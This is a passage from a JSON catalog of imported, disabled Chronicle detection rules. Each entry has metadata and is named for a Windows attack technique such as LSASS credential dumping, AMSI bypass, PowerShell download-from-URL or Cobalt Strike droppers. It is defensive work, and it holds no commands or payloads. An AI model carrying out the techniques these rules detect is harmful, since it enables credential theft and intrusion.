"tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-malicious-use-of-mshtaexe-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_malicious_use_of_mshtaexe_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_malicious_use_of_mshta_exe_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-possible-msbuild-abuse-via-cmdline", "type": "detection", "name": "possible_msbuild_abuse_via_cmdline", "description": "possible_msbuild_abuse_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-msbuild-abuse-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_msbuild_abuse_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/mixed_other/security/possible_msbuild_abuse__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-possible-new-cobalt-strike-dropper", "type": "detection", "name": "possible_new_cobalt_strike_dropper", "description": "possible_new_cobalt_strike_dropper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-new-cobalt-strike-dropper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_new_cobalt_strike_dropper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_new_cobalt_strike_dropper.yaral" } }, { "id": "chronicle-detection-rules-possible-nopowershell-execution-executeassembly-via-cobalt-strike", "type": "detection", "name": "possible_nopowershell_execution_executeassembly_via_cobalt_strike", "description": "possible_nopowershell_execution_executeassembly_via_cobalt_strike", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-nopowershell-execution-executeassembly-via-cobalt-strike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_nopowershell_execution_executeassembly_via_cobalt_strike", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible__nopowershell__execution__execute_assembly_via_cobalt_strike.yaral" } }, { "id": "chronicle-detection-rules-possible-privilege-escalation-attack-using-dllhostexe", "type": "detection", "name": "possible_privilege_escalation_attack_using_dllhostexe", "description": "possible_privilege_escalation_attack_using_dllhostexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-privilege-escalation-attack-using-dllhostexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_privilege_escalation_attack_using_dllhostexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/possible_privilege_escalation_attack_using_dllhost_exe.yaral" } }, { "id": "chronicle-detection-rules-possible-process-enumeration-sysmonwindows-logs", "type": "detection", "name": "possible_process_enumeration_sysmonwindows_logs", "description": "possible_process_enumeration_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-process-enumeration-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_process_enumeration_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_process_enumeration__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-ransomware-or-unauthorized-mbr-modifications", "type": "detection", "name": "possible_ransomware_or_unauthorized_mbr_modifications", "description": "possible_ransomware_or_unauthorized_mbr_modifications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-ransomware-or-unauthorized-mbr-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_ransomware_or_unauthorized_mbr_modifications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/possible_ransomware_or_unauthorized_mbr_modifications.yaral" } }, { "id": "chronicle-detection-rules-possible-shim-database-persistence-via-sdbinstexe", "type": "detection", "name": "possible_shim_database_persistence_via_sdbinstexe", "description": "possible_shim_database_persistence_via_sdbinstexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-shim-database-persistence-via-sdbinstexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_shim_database_persistence_via_sdbinstexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/possible_shim_database_persistence_via_sdbinst_exe.yaral" } }, { "id": "chronicle-detection-rules-possible-spn-enumeration", "type": "detection", "name": "possible_spn_enumeration", "description": "possible_spn_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-spn-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_spn_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/possible_spn_enumeration.yaral" } }, { "id": "chronicle-detection-rules-possible-system-network-configuration-discovery-sysmonwindows-logs", "type": "detection", "name": "possible_system_network_configuration_discovery_sysmonwindows_logs", "description": "possible_system_network_configuration_discovery_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-system-network-configuration-discovery-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_system_network_configuration_discovery_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_system_network_configuration_discovery__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-system-network-connections-discovery-sysmonwindows-logs", "type": "detection", "name": "possible_system_network_connections_discovery_sysmonwindows_logs", "description": "possible_system_network_connections_discovery_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-system-network-connections-discovery-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_system_network_connections_discovery_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_system_network_connections_discovery__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-system-owneruser-discovery-sysmonwindows-logs", "type": "detection", "name": "possible_system_owneruser_discovery_sysmonwindows_logs", "description": "possible_system_owneruser_discovery_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-system-owneruser-discovery-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_system_owneruser_discovery_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_system_owner_user_discovery__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-system-time-discovery-sysmonwindows-logs", "type": "detection", "name": "possible_system_time_discovery_sysmonwindows_logs", "description": "possible_system_time_discovery_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-system-time-discovery-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_system_time_discovery_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_system_time_discovery__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-usage-of-physmem2profit-for-lsass-dump", "type": "detection", "name": "possible_usage_of_physmem2profit_for_lsass_dump", "description": "possible_usage_of_physmem2profit_for_lsass_dump", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-usage-of-physmem2profit-for-lsass-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_usage_of_physmem2profit_for_lsass_dump", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_usage_of_physmem2profit_for_lsass_dump.yaral" } }, { "id": "chronicle-detection-rules-potential-cred-dumping-via-lsass-silentprocessexit-technique", "type": "detection", "name": "potential_cred_dumping_via_lsass_silentprocessexit_technique", "description": "potential_cred_dumping_via_lsass_silentprocessexit_technique", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-cred-dumping-via-lsass-silentprocessexit-technique.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_cred_dumping_via_lsass_silentprocessexit_technique", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_cred_dumping_via_lsass_silentprocessexit_technique.yaral" } }, { "id": "chronicle-detection-rules-potential-credential-dumping-activity-via-lsass", "type": "detection", "name": "potential_credential_dumping_activity_via_lsass", "description": "potential_credential_dumping_activity_via_lsass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-credential-dumping-activity-via-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_credential_dumping_activity_via_lsass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_credential_dumping_activity_via_lsass.yaral" } }, { "id": "chronicle-detection-rules-potential-lsass-process-dump-via-procdump", "type": "detection", "name": "potential_lsass_process_dump_via_procdump", "description": "potential_lsass_process_dump_via_procdump", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-lsass-process-dump-via-procdump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_lsass_process_dump_via_procdump", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_lsass_process_dump_via_procdump.yaral" } }, { "id": "chronicle-detection-rules-potential-rdp-exploit-cve20190708", "type": "detection", "name": "potential_rdp_exploit_cve20190708", "description": "potential_rdp_exploit_cve20190708", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-rdp-exploit-cve20190708.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_rdp_exploit_cve20190708", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/system/potential_rdp_exploit_cve_2019_0708.yaral" } }, { "id": "chronicle-detection-rules-potential-remote-powershell-session-initiated", "type": "detection", "name": "potential_remote_powershell_session_initiated", "description": "potential_remote_powershell_session_initiated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-remote-powershell-session-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_remote_powershell_session_initiated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_remote_powershell_session_initiated.yaral" } }, { "id": "chronicle-detection-rules-potential-solarwinds-mimicking-via-proxy", "type": "detection", "name": "potential_solarwinds_mimicking_via_proxy", "description": "potential_solarwinds_mimicking_via_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-solarwinds-mimicking-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_solarwinds_mimicking_via_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/potential_solarwinds_mimicking__via_proxy.yaral" } }, { "id": "chronicle-detection-rules-potential-suspicious-activity-using-secedit", "type": "detection", "name": "potential_suspicious_activity_using_secedit", "description": "potential_suspicious_activity_using_secedit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-suspicious-activity-using-secedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_suspicious_activity_using_secedit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_suspicious_activity_using_secedit.yaral" } }, { "id": "chronicle-detection-rules-potential-tampering-with-rdp-related-registry-keys-via-reg-exe", "type": "detection", "name": "potential_tampering_with_rdp_related_registry_keys_via_reg_exe", "description": "potential_tampering_with_rdp_related_registry_keys_via_reg_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-tampering-with-rdp-related-registry-keys-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_tampering_with_rdp_related_registry_keys_via_reg_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.yaral" } }, { "id": "chronicle-detection-rules-powershell-amsi-bypass-via-net-reflection", "type": "detection", "name": "powershell_amsi_bypass_via_net_reflection", "description": "powershell_amsi_bypass_via_net_reflection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-amsi-bypass-via-net-reflection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_amsi_bypass_via_net_reflection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_amsi_bypass_via__net_reflection.yaral" } }, { "id": "chronicle-detection-rules-powershell-base64-encoded-shellcode", "type": "detection", "name": "powershell_base64_encoded_shellcode", "description": "powershell_base64_encoded_shellcode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-base64-encoded-shellcode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_base64_encoded_shellcode", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_base64_encoded_shellcode.yaral" } }, { "id": "chronicle-detection-rules-powershell-dll-attacks-detection", "type": "detection", "name": "powershell_dll_attacks_detection", "description": "powershell_dll_attacks_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-dll-attacks-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_dll_attacks_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/powershell_dll_attacks_detection.yaral" } }, { "id": "chronicle-detection-rules-powershell-download-from-url", "type": "detection", "name": "powershell_download_from_url", "description": "powershell_download_from_url", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-download-from-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_download_from_url", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_download_from_url.yaral" } }, { "id": "chronicle-detection-rules-powershell-download-sysmon", "type": "detection", "name": "powershell_download_sysmon", "description": "powershell_download_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-download-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_download_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/powershell_download__sysmon.yaral" } }, { "id": "chronicle-detection-rules-powershell-downloadfile", "type": "detection", "name": "powershell_downloadfile", "description": "powershell_downloadfile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-downloadfile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_downloadfile", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_downloadfile.yaral" } }, { "id": "chronicle-detection-rules-powershell-encoded-command-sysmon", "type": "detection", "name": "powershell_encoded_command_sysmon", "description": "powershell_encoded_command_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-encoded-command-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_encoded_command_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/powershell_encoded_command__sysmon.yaral" } }, { "id": "chronicle-detection-rules-powershell-loaded-via-dll", "type": "detection", "name": "powershell_loaded_via_dll", "description": "powershell_loaded_via_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-loaded-via-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_loaded_via_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/powershell_loaded_via_dll.yaral" } }, { "id": "chronicle-detection-rules-powershell-network-connections", "type": "detection", "name": "powershell_network_connections", "description": "powershell_network_connections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-network-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_network_connections", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/powershell_network_connections.yaral" } }, { "id": "chronicle-detection-rules-powershell-obfuscation-by-agenttesla", "type": "detection", "name": "powershell_obfuscation_by_agenttesla", "description": "powershell_obfuscation_by_agenttesla", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-obfuscation-by-agenttesla.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_obfuscation_by_agenttesla", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/powershell_obfuscation_by_agenttesla.yaral" } }, { "id": "chronicle-detection-rules-powershell-rundll32-remote-thread-creation", "type": "detection", "name": "powershell_rundll32_remote_thread_creation", "description": "powershell_rundll32_remote_thread_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-rundll32-remote-thread-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_rundll32_remote_thread_creation", "source_commit": "74dd490", "license": 